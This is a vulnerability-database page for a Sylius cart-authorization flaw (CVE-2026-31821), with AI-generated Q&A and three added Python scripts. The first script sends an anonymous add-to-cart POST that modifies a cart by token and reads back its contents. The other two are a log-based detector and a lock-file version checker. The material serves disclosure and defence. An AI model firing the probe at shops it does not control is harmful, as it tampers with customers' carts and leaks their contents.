CVE-2026-31821
Status: Received - Intake
Unauthorized Cart Modification in Sylius via Insecure API Endpoint

Publication date: 2026-03-10

Last updated on: 2026-03-11

Assigner: GitHub, Inc.

Description
Sylius is an open source eCommerce framework built on Symfony. The POST /api/v2/shop/orders/{tokenValue}/items endpoint does not verify cart ownership, so an unauthenticated attacker who knows a cart's tokenValue can add arbitrary items to another registered customer's cart. The endpoint answers with the full cart representation (HTTP 201), which also discloses the cart's contents to the attacker. The issue is fixed in versions 2.0.16, 2.1.12 and 2.2.3, and in later releases of each branch.
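A way to verify whether a given Sylius instance still accepts the anonymous add-to-cart described above. This is an added example, not code from the advisory or from the Sylius project. It assumes the JSON-LD request body used by the Sylius shop API (a productVariant IRI plus a quantity) and a cart tokenValue you control; the HTTP transport is injectable so the verdict logic can be exercised without a live shop. Run it only against a test cart you own: on a vulnerable build the probe really adds an item.

```python
import json
import sys
import urllib.error
import urllib.request
from typing import Callable, Dict, Optional, Tuple

# Endpoint named in the advisory (CVE-2026-31821).
ADD_ITEM_PATH = "/api/v2/shop/orders/{tokenValue}/items"

# Assumption of this example: the add-item body is a product variant IRI plus a
# quantity, as in the Sylius shop API. Point it at a variant that exists in your
# catalogue; the code below is illustrative and not part of Sylius.
DEFAULT_VARIANT_IRI = "/api/v2/shop/product-variants/EXAMPLE_VARIANT"

Transport = Callable[[str, bytes, Dict[str, str]], Tuple[int, bytes]]


def build_add_item_request(base_url: str, token_value: str,
                           variant_iri: str = DEFAULT_VARIANT_IRI,
                           quantity: int = 1) -> Tuple[str, bytes, Dict[str, str]]:
    """Build the anonymous POST: no cookie, no Authorization header, token only."""
    url = base_url.rstrip("/") + ADD_ITEM_PATH.format(tokenValue=token_value)
    body = json.dumps({"productVariant": variant_iri, "quantity": quantity}).encode()
    headers = {"Content-Type": "application/ld+json", "Accept": "application/ld+json"}
    return url, body, headers


def send_with_urllib(url: str, body: bytes, headers: Dict[str, str]) -> Tuple[int, bytes]:
    """Real transport; 4xx/5xx come back as (status, body) instead of raising."""
    req = urllib.request.Request(url, data=body, headers=headers, method="POST")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read()
    except urllib.error.HTTPError as err:
        return err.code, err.read()


def classify(status: int, body: bytes) -> Tuple[Optional[bool], str]:
    """(vulnerable?, explanation). Per the advisory, a vulnerable build answers the
    anonymous add with HTTP 201 and the full cart representation; None = inconclusive."""
    if status == 201:
        try:
            items = json.loads(body).get("items", [])
            detail = f"cart now holds {len(items)} item(s)"
        except (ValueError, AttributeError):
            detail = "response body was not a JSON object"
        return True, f"VULNERABLE: anonymous add-to-cart accepted (HTTP 201); {detail}"
    if status in (401, 403, 404):
        return False, f"ownership enforced: anonymous add rejected (HTTP {status})"
    return None, f"inconclusive (HTTP {status}); check the variant IRI and the token"


def probe(base_url: str, token_value: str, variant_iri: str = DEFAULT_VARIANT_IRI,
          send: Transport = send_with_urllib) -> Tuple[Optional[bool], str]:
    url, body, headers = build_add_item_request(base_url, token_value, variant_iri)
    status, resp_body = send(url, body, headers)
    return classify(status, resp_body)


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit("usage: probe.py https://shop.example <cart tokenValue> [variant IRI]")
    vulnerable, verdict = probe(*sys.argv[1:4])
    print(verdict)
    sys.exit(2 if vulnerable else 0)
```

A 404 is treated as "enforced" because a patched build may hide carts it refuses to modify behind the same response as a nonexistent token; a 201 with a cart body is the only unambiguous signal of the flaw. After upgrading, re-run the probe against a cart that belongs to a logged-in test customer and expect a non-201 answer.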
Meta Information
Published: 2026-03-10
Last Modified: 2026-03-11
Generated: 2026-05-06
AI Q&A: 2026-03-11
EPSS Evaluated: 2026-05-05
Also listed in: NVD, EUVD
Affected Vendors & Products (3 associated CPEs)
Vendor   Product   Version / Range
sylius   sylius    from 2.0.0 (inclusive) to 2.0.16 (exclusive)
sylius   sylius    from 2.1.0 (inclusive) to 2.1.12 (exclusive)
sylius   sylius    from 2.2.0 (inclusive) to 2.2.3 (exclusive)
CWE ID Description
CWE-862 The product does not perform an authorization check when an actor attempts to access a resource or perform an action.
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in the Sylius Open Source eCommerce Framework on Symfony, specifically in the POST /api/v2/shop/orders/{tokenValue}/items endpoint.

The endpoint does not verify cart ownership, which means an unauthenticated attacker who knows a cart's tokenValue can add items to that cart.

In other words, if an attacker obtains the tokenValue of another customer's cart, they can add arbitrary items to that customer's cart without authentication.

Additionally, the endpoint returns the full cart representation in the response, which could expose further information.

This issue has been fixed in Sylius versions 2.0.16, 2.1.12, 2.2.3 and above.


How can this vulnerability impact me?

This vulnerability can impact you by allowing an attacker to manipulate your shopping cart without your consent.

An attacker could add unwanted or arbitrary items to your cart, potentially causing confusion, incorrect orders, or financial implications if the order is processed.

Since the attacker does not need to be authenticated, this could affect any customer whose cart tokenValue is known or guessed.

Furthermore, the exposure of the full cart representation in the response could leak sensitive information about your cart contents.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?

I don't know


How can this vulnerability be detected on my network or system? Can you suggest some commands?

I don't know
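One practical detection approach, added here as an example and not part of the page's Q&A or of Sylius: scan web-server access logs for POSTs to the advisory's add-item endpoint and flag clients that wrote to many different carts, or were rejected repeatedly while guessing tokens. A combined-format access log does not record whether a request carried an Authorization header or a cart cookie, so this heuristic catches scripted spraying rather than a single targeted add; for the latter, correlate the cart token's owning customer with the session that issued the request in the Sylius database. The log lines are constructed for the example.

```python
import re
from collections import defaultdict
from typing import Dict, Iterable, Iterator, List, Tuple

# nginx/Apache "combined" format; only client, method, target and status are used.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)
# The advisory's endpoint. Anchored so that PATCH/DELETE on .../items/{id}
# (quantity changes, removals) are not counted as add-item calls.
ADD_ITEM_RE = re.compile(r'^/api/v2/shop/orders/(?P<token>[^/?]+)/items/?$')

# Constructed sample, not real traffic: 203.0.113.7 sprays several cart tokens
# with a scripted client; 198.51.100.4 behaves like an ordinary shopper.
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2026:14:02:11 +0000] "POST /api/v2/shop/orders/a1b2c3/items HTTP/1.1" 201 2310 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2026:14:02:12 +0000] "POST /api/v2/shop/orders/d4e5f6/items HTTP/1.1" 201 2290 "-" "python-requests/2.31"
203.0.113.7 - - [10/Mar/2026:14:02:13 +0000] "POST /api/v2/shop/orders/g7h8i9/items HTTP/1.1" 201 2305 "-" "python-requests/2.31"
198.51.100.4 - - [10/Mar/2026:14:05:40 +0000] "POST /api/v2/shop/orders/j0k1l2/items HTTP/1.1" 201 2250 "https://shop.example/" "Mozilla/5.0"
198.51.100.4 - - [10/Mar/2026:14:06:02 +0000] "PATCH /api/v2/shop/orders/j0k1l2/items/55 HTTP/1.1" 200 2250 "https://shop.example/" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2026:14:02:14 +0000] "POST /api/v2/shop/orders/m3n4o5/items HTTP/1.1" 404 120 "-" "python-requests/2.31"
"""


def add_item_events(lines: Iterable[str]) -> Iterator[Tuple[str, str, int]]:
    """Yield (client ip, cart token, http status) for each POST to the add-item endpoint."""
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m.group("method") != "POST":
            continue
        path = m.group("target").split("?", 1)[0]
        p = ADD_ITEM_RE.match(path)
        if p:
            yield m.group("ip"), p.group("token"), int(m.group("status"))


def summarize(lines: Iterable[str]) -> Dict[str, dict]:
    """Per client: distinct tokens whose add succeeded (201) and count of rejected attempts."""
    stats = defaultdict(lambda: {"succeeded": set(), "rejected": 0})
    for ip, token, status in add_item_events(lines):
        if status == 201:
            stats[ip]["succeeded"].add(token)
        elif status >= 400:
            stats[ip]["rejected"] += 1
    return dict(stats)


def flag(stats: Dict[str, dict], min_tokens: int = 3, min_rejected: int = 5) -> Dict[str, List[str]]:
    """Clients that wrote to many different carts, or were rejected often (token guessing)."""
    return {ip: sorted(s["succeeded"]) for ip, s in stats.items()
            if len(s["succeeded"]) >= min_tokens or s["rejected"] >= min_rejected}


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8", errors="replace") as fh:
            lines = fh.read().splitlines()
    else:
        lines = SAMPLE_LOG.splitlines()
    for ip, tokens in flag(summarize(lines)).items():
        print(f"{ip}: wrote to {len(tokens)} distinct carts: {', '.join(tokens)}")
```

Tune min_tokens to the number of carts a legitimate client plausibly touches in one session (usually one), and run the scan over the period since the affected version was deployed, not just the last rotation.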


What immediate steps should I take to mitigate this vulnerability?

To mitigate this vulnerability, upgrade Sylius to version 2.0.16, 2.1.12, 2.2.3 or above, where the issue has been fixed.
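A check of the pinned Sylius version against the fixed releases in the advisory's affected-version table, added here as an example and not code from the page or from Sylius. It reads composer.lock, which Sylius-Standard projects commit, and assumes the project depends on the sylius/sylius metapackage (if you pin individual Sylius bundles instead, adapt PACKAGE accordingly). The sample lock file is constructed.

```python
import json
import re
import sys
from typing import Optional, Tuple

PACKAGE = "sylius/sylius"

# Fixed versions per branch, from the advisory: 2.0.0 <= v < 2.0.16,
# 2.1.0 <= v < 2.1.12 and 2.2.0 <= v < 2.2.3 are affected.
FIXED_IN = {(2, 0): (2, 0, 16), (2, 1): (2, 1, 12), (2, 2): (2, 2, 3)}

VERSION_RE = re.compile(r"^v?(\d+)\.(\d+)\.(\d+)")


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Accept 'v2.1.10', '2.1.10', '2.1.10-beta'; reject 'dev-main' style refs."""
    m = VERSION_RE.match(text.strip())
    return tuple(int(x) for x in m.groups()) if m else None


def assess(version: str) -> Tuple[Optional[bool], str]:
    """(vulnerable?, message). None means the advisory does not cover this version."""
    v = parse_version(version)
    if v is None:
        return None, f"cannot parse version {version!r}; resolve the pinned commit manually"
    branch = v[:2]
    if branch in FIXED_IN:
        fixed = FIXED_IN[branch]
        if v < fixed:
            return True, f"{version} is affected; upgrade to {'.'.join(map(str, fixed))} or later"
        return False, f"{version} already contains the fix for its branch"
    if v >= (2, 2, 3):
        return False, f"{version} is at or above 2.2.3 and is not listed as affected"
    return None, f"{version} is outside the 2.0 to 2.2 branches the advisory lists"


def installed_version(composer_lock_text: str) -> Optional[str]:
    """Version string of the sylius/sylius package as pinned in composer.lock."""
    data = json.loads(composer_lock_text)
    for pkg in data.get("packages", []) + data.get("packages-dev", []):
        if pkg.get("name") == PACKAGE:
            return pkg.get("version")
    return None


def check_lock(composer_lock_text: str) -> Tuple[Optional[bool], str]:
    version = installed_version(composer_lock_text)
    if version is None:
        return None, f"{PACKAGE} not found in composer.lock"
    return assess(version)


# Constructed sample lock file (not from a real project).
SAMPLE_LOCK = json.dumps({
    "packages": [
        {"name": "symfony/framework-bundle", "version": "v7.2.3"},
        {"name": "sylius/sylius", "version": "v2.1.10"},
    ],
    "packages-dev": [],
})


if __name__ == "__main__":
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8") as fh:
            text = fh.read()
    else:
        text = SAMPLE_LOCK
    vulnerable, message = check_lock(text)
    print(message)
    sys.exit(2 if vulnerable else 0)
```

The check reads the lock file rather than composer.json because the lock file records what is actually installed, while composer.json only records a constraint. A version the advisory does not list (1.x, or a branch pinned to a commit) comes back as None rather than as safe, so it is not silently treated as fixed.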

